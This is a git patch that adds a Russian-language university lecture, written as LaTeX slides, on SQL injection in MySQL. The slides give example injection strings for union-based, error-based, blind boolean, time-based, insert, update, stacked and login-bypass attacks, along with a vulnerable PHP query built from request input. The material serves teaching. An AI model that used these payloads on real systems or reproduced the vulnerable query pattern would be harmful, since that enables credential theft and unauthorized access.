From c786e903ea549020bf1452ab11ff9be8730a1e60 Mon Sep 17 00:00:00 2001 From: Andrew Guschin Date: Tue, 13 Jun 2023 11:32:06 +0400 Subject: =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB=D0=B5=D0=BD=D0=B0?= =?UTF-8?q?=20=D0=BB=D0=B5=D0=BA=D1=86=D0=B8=D1=8F=20=D0=BF=D0=BE=20=D0=B7?= =?UTF-8?q?=D0=B0=D1=89=D0=B8=D1=89=D1=91=D0=BD=D0=BD=D1=8B=D0=BC=20=D0=B1?= =?UTF-8?q?=D0=B0=D0=B7=D0=B0=D0=BC=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- opzbd-lecture/presentation/images/databases.png | Bin 0 -> 31360 bytes opzbd-lecture/presentation/images/metadata_1.png | Bin 0 -> 50639 bytes opzbd-lecture/presentation/images/metadata_10.png | Bin 0 -> 36358 bytes opzbd-lecture/presentation/images/metadata_11.png | Bin 0 -> 31505 bytes opzbd-lecture/presentation/images/metadata_2.png | Bin 0 -> 16780 bytes opzbd-lecture/presentation/images/metadata_3.png | Bin 0 -> 14730 bytes opzbd-lecture/presentation/images/metadata_5.png | Bin 0 -> 31395 bytes opzbd-lecture/presentation/images/metadata_7.png | Bin 0 -> 19764 bytes opzbd-lecture/presentation/images/metadata_8.png | Bin 0 -> 17769 bytes opzbd-lecture/presentation/images/metadata_9.png | Bin 0 -> 14342 bytes opzbd-lecture/presentation/images/sql_joke.png | Bin 0 -> 31577 bytes opzbd-lecture/presentation/images/tables.png | Bin 0 -> 184907 bytes opzbd-lecture/presentation/images/users.png | Bin 0 -> 50113 bytes opzbd-lecture/presentation/presentation.pdf | Bin 0 -> 825799 bytes opzbd-lecture/presentation/presentation.tex | 315 ++++++++++++++++++++++ 15 files changed, 315 insertions(+) create mode 100644 opzbd-lecture/presentation/images/databases.png create mode 100644 opzbd-lecture/presentation/images/metadata_1.png create mode 100644 opzbd-lecture/presentation/images/metadata_10.png create mode 100644 opzbd-lecture/presentation/images/metadata_11.png create mode 100644 opzbd-lecture/presentation/images/metadata_2.png create mode 100644 opzbd-lecture/presentation/images/metadata_3.png create mode 100644 opzbd-lecture/presentation/images/metadata_5.png create mode 100644 opzbd-lecture/presentation/images/metadata_7.png create mode 100644 opzbd-lecture/presentation/images/metadata_8.png create mode 100644 opzbd-lecture/presentation/images/metadata_9.png create mode 100644 opzbd-lecture/presentation/images/sql_joke.png create mode 100644 opzbd-lecture/presentation/images/tables.png create mode 100644 opzbd-lecture/presentation/images/users.png create mode 100644 opzbd-lecture/presentation/presentation.pdf create mode 100644 opzbd-lecture/presentation/presentation.tex (limited to 'opzbd-lecture/presentation') diff --git a/opzbd-lecture/presentation/images/databases.png b/opzbd-lecture/presentation/images/databases.png new file mode 100644 index 0000000..6171aba Binary files /dev/null and b/opzbd-lecture/presentation/images/databases.png differ diff --git a/opzbd-lecture/presentation/images/metadata_1.png b/opzbd-lecture/presentation/images/metadata_1.png new file mode 100644 index 0000000..26a422d Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_1.png differ diff --git a/opzbd-lecture/presentation/images/metadata_10.png b/opzbd-lecture/presentation/images/metadata_10.png new file mode 100644 index 0000000..09045ad Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_10.png differ diff --git a/opzbd-lecture/presentation/images/metadata_11.png b/opzbd-lecture/presentation/images/metadata_11.png new file mode 100644 index 0000000..3c5850d Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_11.png differ diff --git a/opzbd-lecture/presentation/images/metadata_2.png b/opzbd-lecture/presentation/images/metadata_2.png new file mode 100644 index 0000000..95d0a0c Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_2.png differ diff --git a/opzbd-lecture/presentation/images/metadata_3.png b/opzbd-lecture/presentation/images/metadata_3.png new file mode 100644 index 0000000..33061f6 Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_3.png differ diff --git a/opzbd-lecture/presentation/images/metadata_5.png b/opzbd-lecture/presentation/images/metadata_5.png new file mode 100644 index 0000000..7cd2561 Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_5.png differ diff --git a/opzbd-lecture/presentation/images/metadata_7.png b/opzbd-lecture/presentation/images/metadata_7.png new file mode 100644 index 0000000..ade6167 Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_7.png differ diff --git a/opzbd-lecture/presentation/images/metadata_8.png b/opzbd-lecture/presentation/images/metadata_8.png new file mode 100644 index 0000000..07b953d Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_8.png differ diff --git a/opzbd-lecture/presentation/images/metadata_9.png b/opzbd-lecture/presentation/images/metadata_9.png new file mode 100644 index 0000000..430a5ae Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_9.png differ diff --git a/opzbd-lecture/presentation/images/sql_joke.png b/opzbd-lecture/presentation/images/sql_joke.png new file mode 100644 index 0000000..7e0a7a4 Binary files /dev/null and b/opzbd-lecture/presentation/images/sql_joke.png differ diff --git a/opzbd-lecture/presentation/images/tables.png b/opzbd-lecture/presentation/images/tables.png new file mode 100644 index 0000000..075a3b3 Binary files /dev/null and b/opzbd-lecture/presentation/images/tables.png differ diff --git a/opzbd-lecture/presentation/images/users.png b/opzbd-lecture/presentation/images/users.png new file mode 100644 index 0000000..5337bbd Binary files /dev/null and b/opzbd-lecture/presentation/images/users.png differ diff --git a/opzbd-lecture/presentation/presentation.pdf b/opzbd-lecture/presentation/presentation.pdf new file mode 100644 index 0000000..245942f Binary files /dev/null and b/opzbd-lecture/presentation/presentation.pdf differ diff --git a/opzbd-lecture/presentation/presentation.tex b/opzbd-lecture/presentation/presentation.tex new file mode 100644 index 0000000..6cad20f --- /dev/null +++ b/opzbd-lecture/presentation/presentation.tex @@ -0,0 +1,315 @@ +\documentclass{beamer} + +\usepackage[T2A]{fontenc} +\usepackage[utf8]{inputenc} +\usepackage[english,russian]{babel} +\usepackage{wrapfig} +\usepackage{graphicx} +\usepackage{multirow} +\usepackage{fancyvrb} +\usepackage{underscore} +\graphicspath{ {./images/} } + +\usetheme{Madrid} + +\title{SQL инъекция в сервере MySQL} +\author[Андрей, Роман, Иван, Ирина]{Андрей~Гущин \and Роман~Стаин \and Иван~Улитин \and Ирина~Зимина} +\institute[СГУ]{Саратовский Государственный Университет} +\date{6 марта 2023 г.} + +\begin{document} + +\maketitle + +\begin{frame}{Анализ БД через SQL инъекцию} + \begin{minipage}[t]{0.48\linewidth} + \begin{figure}[H] + \includegraphics[width=\textwidth]{databases} + \end{figure} + \end{minipage} + \hfill + \begin{minipage}[t]{0.48\linewidth} + \begin{figure}[H] + \includegraphics[width=0.7\textwidth]{tables} + \end{figure} + \end{minipage} +\end{frame} + +\begin{frame}{Анализ БД через SQL инъекцию} + \begin{figure}[H] + \includegraphics[width=\textwidth]{users} + \end{figure} +\end{frame} + + +\begin{frame}{Функция SERVERPROPERTY} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_1} + \end{figure} +\end{frame} +\begin{frame}{Функция DATABASEPROPERTYEX} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_2} + \end{figure} +\end{frame} +\begin{frame}{Функции DB_NAME и DB_ID} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_3} + \end{figure} +\end{frame} +\begin{frame}{Функции FILE_NAME, FILE_ID и FILE_IDEX} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_5} + \end{figure} +\end{frame} +\begin{frame}{Функции SCHEMA_NAME и SCHEMA_ID} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_7} + \end{figure} +\end{frame} +\begin{frame}{Функции SCHEMA_NAME и SCHEMA_ID} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_8} + \end{figure} +\end{frame} +\begin{frame}{Функции OBJECT_NAME и OBJECT_ID} + \begin{figure}[H] + \includegraphics[width=\textwidth]{metadata_9} + \end{figure} +\end{frame} +\begin{frame}{Функция STATS_DATE} + \begin{figure}[H] + \includegraphics[width=0.8\textwidth]{metadata_10} + \end{figure} +\end{frame} +\begin{frame}{Функция STATS_DATE} + \begin{figure}[H] + \includegraphics[width=0.85\textwidth]{metadata_11} + \end{figure} +\end{frame} + + +\begin{frame}[fragile]{Типы SQL запросов -- Union-based} + \begin{block}{Запрос} + \begin{Verbatim} +SELECT name,email FROM users WHERE id=''; + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +1' UNION SELECT password,secret FROM users -- + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +SELECT name,email FROM users WHERE id='1' +UNION +SELECT password,secret FROM users -- '; + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Error-based} + \begin{block}{Запрос} + \begin{Verbatim} +SELECT name,email FROM users + WHERE id='1' and + ExtractValue(rand(),concat(0x3a,version())) + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Boolean-based} + \begin{block}{Запрос} + \begin{Verbatim} +SELECT email FROM users WHERE id=''; + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +1' and password LIKE 'a% + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +SELECT email FROM users WHERE id='1' and password LIKE 'a%'; + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Time-based} + \begin{block}{Запрос} + \begin{Verbatim} +SELECT login FROM users WHERE id=''; + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +1' AND IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0) + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +SELECT login FROM users + WHERE id='1' AND + IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)'; + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Insert} + \begin{block}{Запрос} + \begin{Verbatim} +INSERT INTO users(email,login,password) + VALUES('','',''); + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +test1','1234'),('my@email.com',VERSION(),'1337') + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +INSERT INTO users(email,login,password) + VALUES('...','test1','1234'), + ('my@email.com',VERSION(),'1337') + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Update} + \begin{block}{Запрос} + \begin{Verbatim} +UPDATE users SET about='about' WHERE id='1'; + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +', email=VERSION() WHERE id='1' + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +UPDATE users SET about='', email=VERSION() + WHERE id='1' -- ' WHERE id='1'; + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Типы SQL запросов -- Stacked} + \begin{block}{Запрос} + \begin{Verbatim} +SELECT login FROM users WHERE id=''; + \end{Verbatim} + \end{block} + \pause + \begin{block}{Инъекция} + \begin{Verbatim} +1'; SELECT password FROM users WHERE id='1 + \end{Verbatim} + \end{block} + \pause + \begin{block}{Запрос с инъекцией} + \begin{Verbatim} +SELECT login FROM users WHERE id='1'; +SELECT password FROM users WHERE id='1'; + \end{Verbatim} + \end{block} +\end{frame} + + +\begin{frame}[fragile]{Инъекция в сложных запросах} + На практике в конце SQL-запроса могут быть дополнительные условия, операторы + сортировки, группировки и другие SQL-конструкции. В каждом конкретном случае, + злоумышленник постарается встроить вредоносный кусок таким образом, чтобы + запрос в целом остался синтаксически корректным, но выболнял другую функцию. + + \begin{block}{Уязвимый запрос с дополнительным условием} + \begin{Verbatim} +$sql = "SELECT username, realname + FROM users WHERE cityid='" + . $_GET['cityid'] . "' AND age<'35'"; + \end{Verbatim} + \end{block} + + \begin{block}{Итоговый запрос} + \begin{Verbatim} +SELECT username, realname FROM users WHERE cityid='20' +UNION SELECT username, password AS realname FROM +users WHERE 1 OR '1' AND age<'35'; + \end{Verbatim} + \end{block} +\end{frame} + +\begin{frame}[fragile]{Результаты запроса не отображаются пользователю} + Может оказаться, что уязвимым является запрос, результаты которого не + отображаются пользователю. + + \begin{block}{Пример 1} + \begin{Verbatim} +$sql = "SELECT count(*) FROM users + WHERE userid='" . $_GET['userid'] . "'"; + \end{Verbatim} + \end{block} + + \begin{block}{Пример 2} + \begin{Verbatim} +SELECT count(*) FROM users +WHERE userid='2' AND password LIKE 'a%'; + \end{Verbatim} + \end{block} + + Взломщик получит "пользователь не найден", если пароль не начинается на букву + 'a', или стандартную страницу с профилем пользователя, в противном случае. + Перебором определяется первая буква пароля, затем вторая и.т.д. + +\end{frame} + +\begin{frame}[fragile]{Login Bypass Authentication} +Это может быть использовано для того, чтобы заставить веб-сервер или любой +другой интерфейс между пользователем и базой данных выполнить указания, которые +необходимы взломщику. + +\begin{block}{Пример 1} + \begin{Verbatim} +SELECT id +FROM users +WHERE login='' AND password=''; + \end{Verbatim} +\end{block} + +\begin{block}{Пример 2} + \begin{Verbatim} +SELECT id FROM users +WHERE login='1234\' AND password='UNION SELECT 1 -- '; + \end{Verbatim} +\end{block} +\end{frame} + +\begin{frame}{Внимание! Анекдот.} + \begin{figure}[H] + \includegraphics[width=0.8\textwidth]{sql_joke} + \end{figure} +\end{frame} + +\begin{frame} + \frametitle{Внимание!} + + \begin{center} + {\Huge Спасибо за внимание!} \\ + {\footnotesize Колоться "--- это незаконно и неэтично.} + \end{center} +\end{frame} + +\end{document} -- cgit v1.2.3